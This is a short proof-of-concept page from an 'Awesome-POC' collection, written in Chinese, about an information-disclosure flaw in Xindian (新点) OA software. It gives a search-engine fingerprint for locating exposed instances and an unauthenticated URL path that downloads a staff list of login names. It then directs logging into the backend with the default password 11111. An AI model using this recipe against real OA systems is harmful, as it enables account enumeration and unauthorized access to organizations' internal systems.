Awesome-POC/OA产品漏洞/新点OA ExcelExport 敏感信息泄露漏洞.md
2024-11-06 14:10:36 +08:00

31 lines
488 B
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# 新点OA ExcelExport 敏感信息泄露漏洞
## 漏洞描述
新点OA 存在敏感信息泄露漏洞访问特定的Url时可以获取所有用户的登录名信息攻击者获取后可以进一步利用
## 漏洞影响
```
新点OA
```
## 网络测绘
```
app="新点OA"
```
## 漏洞复现
构造的Url为
```plain
/ExcelExport/人员列表.xls
```
将会下载人员列表文件
![xindian](images/xindian.png)
通过获取的登录名登陆后台(默认密码11111)